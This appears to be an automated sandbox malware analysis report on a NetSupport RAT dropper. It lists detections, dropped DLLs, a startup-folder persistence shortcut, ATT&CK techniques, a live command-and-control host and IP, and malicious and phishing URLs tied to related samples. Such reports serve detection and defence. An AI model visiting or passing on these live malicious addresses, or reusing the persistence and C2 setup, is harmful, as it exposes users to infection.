                                Source: Yara matchFile source: 0.3.hkpqXovZtS.exe.6728888.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000B.00000000.1370270714.0000000000652000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.3711137674.000000006E8F0000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000002.1372118588.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.3709073509.0000000002FB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.3698855636.0000000000652000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000002.1371512576.0000000000652000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000000.1266608605.0000000000652000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.3710467122.0000000005C50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000003.1569570475.0000000005C50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: hkpqXovZtS.exe PID: 6968, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 6276, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 7496, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SuportUpWin\pcicapi.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SuportUpWin\PCICHEK.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SuportUpWin\AudioCapture.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SuportUpWin\HTCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SuportUpWin\TCCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SuportUpWin\PCICL32.DLL, type: DROPPED
                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity InformationAcquire Infrastructure2
                                Valid Accounts
                                1
                                Windows Management Instrumentation
                                1
                                DLL Side-Loading
                                1
                                DLL Side-Loading
                                1
                                Disable or Modify Tools
                                1
                                Input Capture
                                2
                                System Time Discovery
                                Remote Services1
                                Archive Collected Data
                                1
                                Ingress Tool Transfer
                                Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomainsDefault Accounts4
                                Native API
                                2
                                Valid Accounts
                                2
                                Valid Accounts
                                1
                                Deobfuscate/Decode Files or Information
                                LSASS Memory1
                                Account Discovery
                                Remote Desktop Protocol1
                                Screen Capture
                                2
                                Encrypted Channel
                                Exfiltration Over Bluetooth1
                                Defacement
                                Email AddressesDNS ServerDomain Accounts2
                                Command and Scripting Interpreter
                                1
                                Windows Service
                                21
                                Access Token Manipulation
                                4
                                Obfuscated Files or Information
                                Security Account Manager4
                                File and Directory Discovery
                                SMB/Windows Admin Shares1
                                Input Capture
                                11
                                Non-Standard Port
                                Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts2
                                Service Execution
                                2
                                Registry Run Keys / Startup Folder
                                1
                                Windows Service
                                2
                                Software Packing
                                NTDS144
                                System Information Discovery
                                Distributed Component Object Model3
                                Clipboard Data
                                3
                                Non-Application Layer Protocol
                                Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script13
                                Process Injection
                                1
                                DLL Side-Loading
                                LSA Secrets671
                                Security Software Discovery
                                SSHKeylogging3
                                Application Layer Protocol
                                Scheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                                Registry Run Keys / Startup Folder
                                1
                                Masquerading
                                Cached Domain Credentials14
                                Virtualization/Sandbox Evasion
                                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                                Valid Accounts
                                DCSync3
                                Process Discovery
                                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job14
                                Virtualization/Sandbox Evasion
                                Proc Filesystem11
                                Application Window Discovery
                                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                                Access Token Manipulation
                                /etc/passwd and /etc/shadow1
                                System Owner/User Discovery
                                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron13
                                Process Injection
                                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand
                                SourceDetectionScannerLabelLink
                                hkpqXovZtS.exe53%ReversingLabsWin32.Trojan.Nekark
                                hkpqXovZtS.exe100%AviraTR/AD.Nekark.wokwj
                                hkpqXovZtS.exe100%Joe Sandbox ML
                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Roaming\SuportUpWin\AudioCapture.dll3%ReversingLabs
                                C:\Users\user\AppData\Roaming\SuportUpWin\HTCTL32.DLL13%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\AppData\Roaming\SuportUpWin\PCICHEK.DLL5%ReversingLabs
                                C:\Users\user\AppData\Roaming\SuportUpWin\PCICL32.DLL17%ReversingLabs
                                C:\Users\user\AppData\Roaming\SuportUpWin\TCCTL32.DLL6%ReversingLabs
                                C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe30%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\AppData\Roaming\SuportUpWin\msvcr100.dll0%ReversingLabs
                                C:\Users\user\AppData\Roaming\SuportUpWin\pcicapi.dll3%ReversingLabs
                                C:\Users\user\AppData\Roaming\SuportUpWin\remcmdstub.exe24%ReversingLabsWin32.Trojan.Generic
                                No Antivirus matches
                                No Antivirus matches
                                SourceDetectionScannerLabelLink
                                http://www.symauth.com/rpa000%URL Reputationsafe
                                http://www.symauth.com/cps0(0%URL Reputationsafe
                                NameIPActiveMaliciousAntivirus DetectionReputation
                                geo.netsupportsoftware.com
                                104.26.0.231
                                truefalse
                                  unknown
                                  pbkvithtosh07.com
                                  51.89.111.5
                                  truetrue
                                    unknown
                                    NameMaliciousAntivirus DetectionReputation
                                    http://geo.netsupportsoftware.com/location/loca.aspfalse
                                      unknown
                                      http://51.89.111.5/fakeurl.htmtrue
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://www.pci.co.uk/supporthkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372118588.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.drfalse
                                          unknown
                                          http://%s/testpage.htmwininet.dllclient32.exe, 00000003.00000002.3711137674.000000006E8F0000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.0.drfalse
                                            unknown
                                            http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.drfalse
                                              unknown
                                              http://www.pci.co.uk/supportsupporthkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372118588.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.drfalse
                                                unknown
                                                http://www.symauth.com/rpa00hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr, PCICL32.DLL.0.dr, AudioCapture.dll.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://geo.netsupportsoftware.com/location/loca.eclient32.exe, 00000003.00000002.3710157110.0000000005AE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://127.0.0.1RESUMEPRINTINGhkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.drfalse
                                                    unknown
                                                    http://www.netsupportschool.com/tutor-assistant.asp11(LhkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372118588.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.drfalse
                                                      unknown
                                                      http://%s/testpage.htmclient32.exe, client32.exe, 00000003.00000002.3711137674.000000006E8F0000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.0.drfalse
                                                        unknown
                                                        http://geo.netsupportsoftware.com/location/loca.aspsclient32.exe, 00000003.00000003.1324848844.0000000005AE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://127.0.0.1client32.exe, client32.exe, 0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.drfalse
                                                            unknown
                                                            http://geo.netsupportsoftware.com/location/loca.aspjclient32.exe, 00000003.00000003.1324848844.0000000005AE5000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710157110.0000000005AE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://www.symauth.com/cps0(hkpqXovZtS.exe, 00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp, hkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe.0.dr, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr, PCICL32.DLL.0.dr, AudioCapture.dll.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.netsupportschool.com/tutor-assistant.asphkpqXovZtS.exe, 00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, client32.exe, 0000000B.00000002.1372118588.00000000111E2000.00000004.00000001.01000000.00000008.sdmp, PCICL32.DLL.0.drfalse
                                                                unknown
                                                                http://%s/fakeurl.htmclient32.exe, client32.exe, 00000003.00000002.3711137674.000000006E8F0000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.0.drfalse
                                                                  unknown
                                                                  http://geo.netsupportsoftware.com/client32.exe, 00000003.00000003.1324848844.0000000005AE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://geo.netsupportsoftware.com/location/loca.asplclient32.exe, 00000003.00000003.1324775977.0000000005B04000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000002.3710157110.0000000005B04000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000003.00000003.1569692989.0000000005B04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      51.89.111.5
                                                                      pbkvithtosh07.comFrance
                                                                      16276OVHFRtrue
                                                                      104.26.0.231
                                                                      geo.netsupportsoftware.comUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1546938
                                                                      Start date and time:2024-11-01 18:10:09 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 10m 33s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:18
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:hkpqXovZtS.exe
                                                                      renamed because original name is a hash value
                                                                      Original Sample Name:197c2d218121ff0ec738f5d301bf13b7824320c07942b99c9f278e8d7508b15d.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.rans.troj.evad.winEXE@4/16@7/2
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:
                                                                      • Successful, ratio: 79%
                                                                      • Number of executed functions: 177
                                                                      • Number of non-executed functions: 205
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • VT rate limit hit for: hkpqXovZtS.exe
                                                                      TimeTypeDescription
                                                                      14:51:51API Interceptor13254612x Sleep call for process: client32.exe modified
                                                                      18:11:06AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\autorunins.ini.lnk
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      104.26.0.231file.exeGet hashmaliciousNetSupport RATBrowse
                                                                      • geo.netsupportsoftware.com/location/loca.asp
                                                                      qvoLvRpRbr.msiGet hashmaliciousNetSupport RATBrowse
                                                                      • geo.netsupportsoftware.com/location/loca.asp
                                                                      EMX97rT0GX.msiGet hashmaliciousNetSupport RATBrowse
                                                                      • geo.netsupportsoftware.com/location/loca.asp
                                                                      Support_auto.msiGet hashmaliciousNetSupport RATBrowse
                                                                      • geo.netsupportsoftware.com/location/loca.asp
                                                                      SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                                                                      • geo.netsupportsoftware.com/location/loca.asp
                                                                      SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                                                                      • geo.netsupportsoftware.com/location/loca.asp
                                                                      information_package.exeGet hashmaliciousNetSupport RAT, NetSupport Downloader, Stealc, VidarBrowse
                                                                      • geo.netsupportsoftware.com/location/loca.asp
                                                                      updates.jsGet hashmaliciousNetSupport RATBrowse
                                                                      • geo.netsupportsoftware.com/location/loca.asp
                                                                      updates.jsGet hashmaliciousNetSupport RATBrowse
                                                                      • geo.netsupportsoftware.com/location/loca.asp
                                                                      updates.jsGet hashmaliciousNetSupport RATBrowse
                                                                      • geo.netsupportsoftware.com/location/loca.asp
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      geo.netsupportsoftware.comfile.exeGet hashmaliciousNetSupport RATBrowse
                                                                      • 104.26.1.231
                                                                      file.exeGet hashmaliciousNetSupport RATBrowse
                                                                      • 104.26.1.231
                                                                      CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                      • 172.67.68.212
                                                                      CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                      • 172.67.68.212
                                                                      CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                      • 172.67.68.212
                                                                      CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                      • 104.26.1.231
                                                                      Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                      • 104.26.1.231
                                                                      Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                      • 104.26.1.231
                                                                      https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                      • 172.67.68.212
                                                                      file.exeGet hashmaliciousNetSupport RATBrowse
                                                                      • 172.67.68.212
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      OVHFRz1ProductSampleRequirement.exeGet hashmaliciousRemcosBrowse
                                                                      • 51.75.166.98
                                                                      file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                      • 51.255.106.85
                                                                      https://send-space.s3.eu-north-1.amazonaws.com/de.htmlGet hashmaliciousUnknownBrowse
                                                                      • 51.91.79.17
                                                                      VkTNb6p288.exeGet hashmaliciousFormBookBrowse
                                                                      • 5.39.10.93
                                                                      12Jh49DCAj.exeGet hashmaliciousXmrigBrowse
                                                                      • 54.37.232.103
                                                                      El9HaBFrFM.exeGet hashmaliciousBlank GrabberBrowse
                                                                      • 51.89.9.252
                                                                      https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                      • 54.37.62.77
                                                                      http://3d1.gmobb.jp/dcm299ccyag4e/gov/Get hashmaliciousPhisherBrowse
                                                                      • 178.32.210.226
                                                                      https://www.kwconnect.com/redirect?url=https%3A%2F%2Fwww.ingenieriawj.com/trx/#XdGFtYXJhLnBlcmVpcmFkZWplc3VzQGRhaWljaGktc2Fua3lvLmV1Get hashmaliciousHTMLPhisherBrowse
                                                                      • 149.56.200.84
                                                                      segura.vbsGet hashmaliciousRemcosBrowse
                                                                      • 164.132.58.105
                                                                      CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                      • 188.114.97.3
                                                                      Setup.exeGet hashmaliciousUnknownBrowse
                                                                      • 1.1.1.1
                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                      • 172.64.41.3
                                                                      https://issuu.com/mathildagr/docs/pmd9746827?fr=sZTMyNjc4NzAyNzMGet hashmaliciousUnknownBrowse
                                                                      • 104.17.24.14
                                                                      file.exeGet hashmaliciousNetSupport RATBrowse
                                                                      • 104.26.1.231
                                                                      file.exeGet hashmaliciousNetSupport RATBrowse
                                                                      • 104.26.1.231
                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                      • 188.114.96.3
                                                                      https://myabd.co.uk/main/arull.php?7080797967704b53693230746450544d6f737a6b6a4e533076544b7972566438774a38394d4841413d3d#EMAILBASE64#Get hashmaliciousHTMLPhisherBrowse
                                                                      • 104.17.25.14
                                                                      https://otcengine3.valr.live/signInGet hashmaliciousUnknownBrowse
                                                                      • 104.17.24.14
                                                                      https://u47872954.ct.sendgrid.net/ls/click?upn=u001.fn1BsYIkFXRWxBLF12AvXhKUqktmOI7EPkchHYpa8lb2yJr9vm47Biq1iwhYH4x0W6E6_1tlZTUgFpToOJRvXeJjZ1lQQtiPaV281MW3UjMlmRxOXQrHf3E28Ct8cWw3pFJv8ww35QVlHVAsV9LrE8WJ-2FqWVvVFyUxLS7XbjE4ioBaNzI7Y9AQvglzmjEqljOvLuB-2FqyLAOnwfIZ8a2UOhb0kq4DsltFbCSVl8L5tTVcXPovhejZuw7J5gFYEuhvfLU6jp9IiI6bOp4vutoVple794Svog7VmNTHCQykEIajsBwvsIA9xBhrTaUhPe3riTZOj5RQVgP8LolzHF5ds6ImaI4Q1KNsmEF06CineSoPu7BKGd-2B4IINKzojAY3yUTkdWQLuCwDcmh7vK-2Fm4MQ0xAiPJ-2BNim16FZPVrX44e4DFM1rc1r1ZYN2APdeEIThalu0Ag-2BNzl5TCF9-2F-2B4cIgV-2B8ceF573hvcKOOmdD1jbxRbFryn-2FGT77SPyR6cNo7joqYajHU5-2F1gyPof24NnmOIwvhn7qKr0Ihz3SIWFLubPXV0GdcG6guT-2FBjwN6h83YPSF-2F5Pk0uzrf9DG4ZRnISsjJaazqmdBRAAsyoWwP5iXWDQEfiJXubX9fD-2BREtQifDIoI36c8qvCy5hrOP9aAfzd2djtg-2B8gR7MvgWYCa5sA7wAgdCKrrNRjX7eeAtG5StCtmRi-2BsSO4PCFgsA4QlR8AVRyhdPdKhSYzgA-2F1BCyYmRsFeWn4YzRn0mexGeZM3PwhHAdqlfom16LJGSiVeG98p5ZK5N-2BZQuMTlINorxwlmSmaGarY5x7TUyztB-2Bv8L8gRhXdcDKSzxiMknwYCjp3XaQdwr-2Fp8kePQSl33tJvX1ITAiP7FBhlwoPgNxbRoTwVzl0I2Q2bE71pQB2jeSQldBukVcgJT-2BrmpKQA1GW5-2B59frk-3DGet hashmaliciousUnknownBrowse
                                                                      • 172.66.40.133
                                                                      No context
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      C:\Users\user\AppData\Roaming\SuportUpWin\AudioCapture.dllCiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                        CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                          CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                            CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                              Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                  https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                    upd_8707558.msixGet hashmaliciousNetSupport RATBrowse
                                                                                      information_package.exeGet hashmaliciousNetSupport RAT, NetSupport Downloader, Stealc, VidarBrowse
                                                                                        Update_2762895.msixGet hashmaliciousNetSupport RATBrowse
                                                                                          C:\Users\user\AppData\Roaming\SuportUpWin\HTCTL32.DLLUpdate.jsGet hashmaliciousNetSupport RATBrowse
                                                                                            update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                              Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                  updates.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                    updates.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                      Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                        updates.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                          Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                            Update_124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                              Process:C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:modified
                                                                                                              Size (bytes):15
                                                                                                              Entropy (8bit):2.7329145639793984
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:QJgTG:QkG
                                                                                                              MD5:8AB0D91EF06123198FFAC30AD08A14C7
                                                                                                              SHA1:46D83BB84F74D8F28427314C6084CC9AFE9D1533
                                                                                                              SHA-256:DB50064FEE42FB57DCFD9C4269A682331246224D6108A18DB83ABD400CCECA12
                                                                                                              SHA-512:1AA8560708AD663C4D5D0C2199E2CE472D11748EDA18848AAA3430C6F333BB04DA65DFFF4144BFEEA3860CA30F7F832EC64FF6D5B0731AC8878050601AC7A3A3
                                                                                                              Malicious:false
                                                                                                              Reputation:moderate, very likely benign file
                                                                                                              Preview:32.7767,-96.797
                                                                                                              Process:C:\Users\user\Desktop\hkpqXovZtS.exe
                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Icon number=0, Hidden, Archive, ctime=Fri Nov 1 16:11:03 2024, mtime=Fri Nov 1 16:11:03 2024, atime=Mon Feb 26 22:55:38 2018, length=106864, window=hide
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1893
                                                                                                              Entropy (8bit):3.297429290763084
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:8ryV025h9W2IbDOlFA344RlMo7oAjMJoJtm:8ryV02fYmlu34mlMEDgJoJt
                                                                                                              MD5:3DC51D085739FF42C5E4C34063816B2C
                                                                                                              SHA1:9EB88038A24809A71D04A4AC041F1680539A33A3
                                                                                                              SHA-256:95D919B6264E8BDB4B75521565305DC9D2211C43490A5563F2F004D1EF46C2CD
                                                                                                              SHA-512:5152CA1417020A213CC2061F7C57261F1ECC9B905378E25CF862FB38A80CCE43658EEBEC1CB2B3B890D15956B317C8B4EDE3E9A0E8081561E4184694E036CD61
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview:L..................F.@.."....y...,.......,...9.L]...p.........................:..DG..Yr?.D..U..k0.&...&......Qg.*_........,.......,......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=aY]...........................3*N.A.p.p.D.a.t.a...B.V.1.....aYb...Roaming.@......EW.=aYb...............................R.o.a.m.i.n.g.....`.1......X....SUPORT~1..H......aYb.aYb.............................+.S.u.p.o.r.t.U.p.W.i.n.....f.2.p...ZL.".client32.exe..J......aYb.aYb...............................c.l.i.e.n.t.3.2...e.x.e.......j...............-.......i...........0.<.....C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe....a.u.t.o.r.u.n.i.n.s...i.n.i.'.....\.....\.....\.....\.....\.S.u.p.o.r.t.U.p.W.i.n.\.c.l.i.e.n.t.3.2...e.x.e...C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.S.u.p.o.r.t.U.p.W.i.n.$.C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.1.........%APPDATA%\1.............................................
                                                                                                              Process:C:\Users\user\Desktop\hkpqXovZtS.exe
                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):93560
                                                                                                              Entropy (8bit):6.5461580255883876
